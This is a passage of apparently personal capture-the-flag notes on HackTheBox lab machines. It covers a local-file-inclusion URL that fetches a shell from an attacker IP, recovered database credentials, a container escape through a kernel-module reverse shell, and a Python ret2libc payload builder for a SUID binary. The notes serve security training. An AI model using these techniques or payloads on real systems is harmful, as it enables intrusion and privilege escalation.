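# ServerName / ServerAlias at line start; a leading '#' means commented out, so it is skipped
VHOST = re.compile(r"^\s*(?:ServerName|ServerAlias)\s+(\S+)", re.M)


def parse_vhosts(text):
    """Return the distinct host names from an Apache vhost config (candidates for /etc/hosts)."""
    names = []
    for name in VHOST.findall(text):
        if name not in names:
            names.append(name)
    return names


def login_users(passwd_text):
    """Return (user, shell) for /etc/passwd entries whose shell is a real login shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false", "sync")):
            users.append((fields[0], fields[6]))
    return users


# constructed sample input: the snippets the notes show from the target
WP_CONFIG = """
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );
define( 'DB_COLLATE', '' );
"""

APACHE_VHOST = """
#ServerName www.example.com
\tServerAdmin admin@monitors.htb
\tServerName cacti-admin.monitors.htb
\tDocumentRoot /usr/share/cacti
\tServerAlias cacti-admin.monitors.htb
"""

PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
          "marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash\n")

if __name__ == "__main__":
    print(lfi_url("monitors.htb", "/etc/passwd"))
    print(lfi_url("monitors.htb", "http://10.10.14.2/shell.txt"))  # assumed attacker host
    print(parse_wp_config(WP_CONFIG))
    print(parse_vhosts(APACHE_VHOST))
    print(login_users(PASSWD))
```

The vhost names are the ones to add to /etc/hosts before retrying the fuzzing, and the wp-config defines are what to try first on MySQL and on any other login the box exposes.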

from www-data to …
  • ps
  1355 ?        Ssl    0:00 /usr/bin/containerd
  1373 ?        Ssl    0:00 /usr/lib/policykit-1/polkitd --no-debug
  1420 tty1     Ss+    0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
  1496 ?        Sl     0:03 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
  1512 ?        Ss     0:00 /usr/sbin/apache2 -k start
  1586 ?        Ssl    0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
  2091 ?        Sl     0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
  2102 ?        Sl     0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/109e2d8f43c5a10ddb0b3b823c3c1efc095a7c76b4397c73c4a14c6de917d0a4 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
  2135 ?        Ssl    0:05 /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
  2309 ?        Ssl    0:50 /usr/local/openjdk-8/bin/java -XX:MaxPermSize=256m -XX:+HeapDumpOnOutOfMemoryError -Xmx1024m -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /root/.gradle/wrapper/dists/gradle-3.2.1-bin/erlz51pt56t1o6vc7t39cikug/gradle-3.2.1/lib/gradle-launcher-3.2.1.jar org.gradle.launcher.daemon.bootstrap.GradleDaemon 3.2.1
  2361 ?        Sl     1:38 /usr/local/openjdk-8/bin/java -Xms128M -Xmx1024M -Dfile.encoding=UTF-8 -Duser.country -Duser.language=en -Duser.variant -cp /usr/src/apache-ofbiz-17.12.01/build/libs/ofbiz.jar org.apache.ofbiz.base.start.Start

we see:

  • docker on port 8443 (docker-proxy forwards 127.0.0.1:8443 to the container 172.17.0.2:8443)

  • java (OFBiz launched through the gradle wrapper)

  • ports:
    • 3306 >> mysql >> hash of the wp admin user $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 >> try to crack it with john >> not :’(
    • 8443 ?

  • in marcus’ folder there is a .backup folder that I cannot read

OFBiz 17.12.01 is running as root (probably inside the Docker container, since docker-proxy forwards 127.0.0.1:8443 to 172.17.0.2) and is vulnerable! For that, first… I will use chisel (a chisel client on the box with a reverse forward to a chisel server on my machine) to bring port 8443 to my localhost

got it, I have a shell as root but I am in a container :(

capsh --print shows that I have cap_sys_module

with this capability we can load kernel modules, and since a container shares the host kernel, a module we craft runs on the host: we build a kernel module that gives us a reverse shell.. https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_sys_module (it has to be compiled against the host’s kernel version, which is:)

Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux


Machine Pit - Hard - abandoned

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
9090/tcp open  zeus-admin syn-ack ttl 63
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:

9090 is a DMS? it serves a TLS login page (the certificate is for dms-pit.htb), a kind of login into the machine… 80 is an empty nginx test page, and 22 (OpenSSH 8.0) doesn’t seem vulnerable


Machine - Frolic - Easy

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
1880/tcp open  vsat-control syn-ack ttl 63
9999/tcp open  abyss        syn-ack ttl 63
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds  Samba smbd 4.3.11-Ubuntu
1880/tcp open  vsat-control?
9999/tcp open  abyss?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m26s, deviation: 3h10m29s, median: 32s
| smb2-time:
|   date: 2021-11-06T17:18:04
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2021-11-06T22:48:04+05:30

9999 nginx

PORT     STATE SERVICE VERSION
9999/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /backup/: Possible backup
|_  /test/: Test page
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

in the backup there is a password.txt that says

password - imnothuman
user - admin

credentials not valid for node-red

in the admin page the login check was done client-side in JS; once we log in as admin we see

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
!.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
.?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
!.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
!!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
!!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
!!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
..!.! !!!!! !.?.

this looks like the Ook! language (https://esolangs.org/wiki/ook!), in its short form that keeps only the . ? ! symbols

after running it through an online Ook! interpreter we get the message: Nothing here check /asdiSIAJJ0QWE9JAS

where we found this

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA

after base64-decoding it and looking at the magic bytes (50 4b 03 04, "PK.."), we see it’s a ZIP file :)

we try to unzip it… but it asks for a password; inside there is an index.php file

with zip2john we get the hash of the archive and we can crack it with john: the password is password

and the index.php file contains…

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

it seems to be hex; let’s decode it to ASCII…

KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

we decode the base64 to…

+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

running this as a Brainfuck program prints:

idkwhatispass
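
The whole decode chain above, as an added example that is not part of the original notes: the two base64 blobs are the ones shown above, embedded as sample input; the Ook! translator and the Brainfuck interpreter are written for this example (the script identifies the first blob as a ZIP and lists its encrypted member, and runs the Brainfuck from the second blob to recover the password).

```python
import base64
import io
import zipfile

# Added example (not from the original notes): the decode chain from the notes in one
# script. The two base64 blobs are the ones shown in the notes, embedded here as sample
# input; the Ook! translator and the Brainfuck interpreter are written for this example.

ZIP_B64 = """
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA
"""

BF_B64 = """
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
"""

MAGIC = {b"PK\x03\x04": "zip", b"\x1f\x8b": "gzip", b"\x7fELF": "elf",
         b"\x89PNG": "png", b"%PDF": "pdf"}


def sniff(data):
    """Identify a decoded blob by its leading magic bytes ('unknown' if none match)."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def zip_members(data):
    """List (name, encrypted) for each member; bit 0 of the flags marks ZipCrypto."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(info.filename, bool(info.flag_bits & 1)) for info in zf.infolist()]


# Ook! is Brainfuck with each command spelled as a pair of Ook./Ook?/Ook! words;
# the blob in the notes uses the short form with just the punctuation, accepted here too.
OOK = {".?": ">", "?.": "<", "..": "+", "!!": "-",
       "!.": ".", ".!": ",", "!?": "[", "?!": "]"}


def ook_to_bf(text):
    """Translate Ook! (long or short form) to Brainfuck."""
    syms = [c for c in text if c in ".?!"]
    if len(syms) % 2:
        raise ValueError("odd number of Ook symbols, text is probably truncated")
    return "".join(OOK[a + b] for a, b in zip(syms[::2], syms[1::2]))


def run_bf(code, stdin=b"", max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 8-bit wrapping cells and a step limit, so a
    garbled or truncated program cannot hang the script."""
    prog = [c for c in code if c in "<>+-.,[]"]
    jump, stack = {}, []
    for i, c in enumerate(prog):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced brackets")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets")
    tape, ptr, pc, out, inp = [0] * 30000, 0, 0, [], list(stdin)
    for _ in range(max_steps):
        if pc >= len(prog):
            return "".join(out)
        c = prog[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    raise RuntimeError("step limit reached")


def index_php_secret():
    """Decode the base64 found in index.php and run the Brainfuck it contains."""
    return run_bf(base64.b64decode(BF_B64).decode())


if __name__ == "__main__":
    blob = base64.b64decode(ZIP_B64)
    print(sniff(blob), zip_members(blob))   # zip [('index.php', True)]
    print(index_php_secret())               # idkwhatispass
```

The step limit in run_bf is the practical safeguard: a copy-paste that drops a single symbol can turn a decoder into an endless loop, and the odd-length check in ook_to_bf catches the same problem before the program even runs.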

1880 node red

PORT     STATE SERVICE VERSION
1880/tcp open  http    Node.js (Express middleware)

smb

SMB         10.10.10.111    445    FROLIC           [+] \admin:imnothuman
SMB         10.10.10.111    445    FROLIC           [+] Enumerated shares
SMB         10.10.10.111    445    FROLIC           Share           Permissions     Remark
SMB         10.10.10.111    445    FROLIC           -----           -----------     ------
SMB         10.10.10.111    445    FROLIC           print$                          Printer Drivers
SMB         10.10.10.111    445    FROLIC           IPC$                            IPC Service (frolic server (Samba, Ubuntu))

samba 4.3.11

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
sahay:x:1000:1000:Ayush Sahay,,,:/home/sahay:/bin/bash
ayush:x:1001:1001:,,,:/home/ayush:/bin/bash

two new users ayush and sahay

 "_credentialSecret": "46e43b7222a93bc2b3b5d4aad74d7ad009057e9913549e52ebba6632b96ec850",
            password: "$2a$08$M6GkqpR1GdCDkQYXsR4zGOCl4gA/vWgNBSNKzCRr2RFKyYJNf08q.",

finally we find a binary called rop that has the SUID bit set!

we should buffer overflow it? :)

Buffer overflow
  • let’s copy the binary to our machine to work on it more comfortably :)

  • install gef for gdb

    • checksec inside gdb shows the protections of the binary
    • NX is enabled, meaning we cannot execute code on the stack
    • pattern create gives you a cyclic pattern
    • run "<pattern here>"
    • pattern offset $eip shows the offset to the saved return address is 52 bytes
  • since NX is active (stack execution protection) we need to use ret2libc

    • we need the addresses of system, exit and a "/bin/sh" string
    • on the victim machine we can:
      • 1. get the base address of libc
        • ldd <binary> 0xb7e1900
      • 2. get the offsets of system and exit
        • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
        • we get the value of system@@GLIBC_2.0 0003ada0
        • exit 0002e9d0
      • 3. get the offset of a /bin/sh occurrence:
        • strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh 15ba0b
    • the full address of each one is libc base + offset
    • payload = 52 bytes of padding + addr_of_system + addr_of_exit + addr_of_bin_sh (exit is the address system returns to, /bin/sh is its argument)
  • is ASLR active? cat /proc/sys/kernel/randomize_va_space (0 means off, 2 means full randomization; if it is on, the libc base from ldd changes on every run)
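
As an added example (not code from the original notes), a Python script that turns the values collected above into the ret2libc payload and sanity-checks it. The symbol offsets are the ones recorded above; the readelf/strings sample lines are constructed in the shape of those tools' output; the libc base 0xb7e19000 is an assumed value, since the real one must be read from ldd on the target and is only stable when ASLR is off.

```python
import struct

# Added example (not from the original notes): build the 32-bit ret2libc chain from a
# libc base and symbol offsets, and check it. The offsets are the ones the notes record;
# the libc base used in __main__ is an assumed value (the real one comes from ldd on
# the target, and is only stable when ASLR is off).

# constructed sample output, shaped like `readelf -s libc.so.6 | grep system` and
# `strings -a -t x libc.so.6 | grep bin/sh`, carrying the offsets from the notes
READELF_OUT = """
   245: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
   139: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
"""
STRINGS_OUT = """
 15ba0b /bin/sh
"""


def readelf_offset(output, symbol):
    """Offset of `symbol` from `readelf -s` output (Num: Value Size Type Bind Vis Ndx Name)."""
    for line in output.splitlines():
        fields = line.split()
        if len(fields) >= 8 and fields[7].split("@")[0] == symbol:
            return int(fields[1], 16)
    raise LookupError(symbol)


def strings_offset(output, needle):
    """Offset of the first `strings -t x` line whose string contains `needle`."""
    for line in output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and needle in parts[1]:
            return int(parts[0], 16)
    raise LookupError(needle)


def p32(value):
    """Pack a 32-bit little-endian address."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def ret2libc_payload(libc_base, system_off, exit_off, binsh_off, eip_offset=52):
    """Padding up to the saved EIP, then system(), the address system returns to
    (exit, so the process ends cleanly) and system's argument (a "/bin/sh" inside libc)."""
    system = libc_base + system_off
    exit_addr = libc_base + exit_off
    binsh = libc_base + binsh_off
    return b"A" * eip_offset + p32(system) + p32(exit_addr) + p32(binsh)


def bad_bytes(payload, eip_offset=52, forbidden=(0x00, 0x0A)):
    """Addresses in the chain containing bytes that an argv/strcpy-style copy would
    truncate on (NUL) or that break line-based input (newline)."""
    chain = payload[eip_offset:]
    hits = []
    for i in range(0, len(chain), 4):
        word = chain[i:i + 4]
        if any(b in forbidden for b in word):
            hits.append(struct.unpack("<I", word)[0])
    return hits


if __name__ == "__main__":
    base = 0xB7E19000  # assumed; read it from `ldd ./rop` on the target
    payload = ret2libc_payload(base,
                               readelf_offset(READELF_OUT, "system"),
                               readelf_offset(READELF_OUT, "exit"),
                               strings_offset(STRINGS_OUT, "/bin/sh"))
    print(payload.hex())
    print("bad addresses:", [hex(a) for a in bad_bytes(payload)])
```

The binary takes the overflowing string as its argument, so the chain is passed as ./rop "$(python3 script.py-style output)" on the target; bad_bytes is the check to run first, because a NUL inside any of the three addresses cuts the argument short and the chain silently never reaches system.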
